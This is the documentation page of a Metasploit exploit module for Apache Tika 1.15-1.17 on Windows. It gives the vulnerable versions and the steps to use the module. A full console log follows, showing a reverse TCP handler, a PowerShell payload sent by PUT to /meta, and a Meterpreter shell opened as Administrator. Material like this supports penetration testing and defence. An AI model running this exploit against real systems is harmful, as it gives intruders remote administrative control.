Files
metasploit-gs/documentation/modules/exploit/windows/http/apache_tika_jp2_jscript.md
T
2019-07-30 16:55:06 -04:00

2.0 KiB

Vulnerable Application

This module works against Windows installations of Apache Tika 1.15-1.17, and was successfully tested on 1.15-1.17. Apache Tika can be downloaded from here, and requires Java to be installed. While the vulnerability is reported in more versions, exploitation was only successful against > 1.14 when jp2 was added as per this comment.

Rhino Security Labs has an Excellent write-up describing this vulnerability. Find it on rhinosecuritylabs.com or wayback.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploits/windows/http/apache_tika_jp2_jscript
  4. Do: run
  5. You should get a shell.

Scenarios

1.17 on Windows 2012 running as Administrator

resource (tika.rb)> use exploits/windows/http/apache_tika_jp2_jscript
resource (tika.rb)> set rhost 2.2.2.2
rhost => 2.2.2.2
resource (tika.rb)> set verbose true
verbose => true
resource (tika.rb)> check
[*] Apache Tika Version Detected: 1.17
[+] 2.2.2.2:9998 - The target is vulnerable.
resource (tika.rb)> run
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Powershell command length: 2278
[*] Sending PUT request to 2.2.2.2:9998/meta
[*] Sending stage (179779 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49313) at 2019-03-28 21:33:09 -0400

meterpreter > getuid
Server username: WIN-OBKF2JFCDKL\Administrator
meterpreter > getpid
Current pid: 1552
meterpreter > sysinfo
Computer        : WIN-OBKF2JFCDKL
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows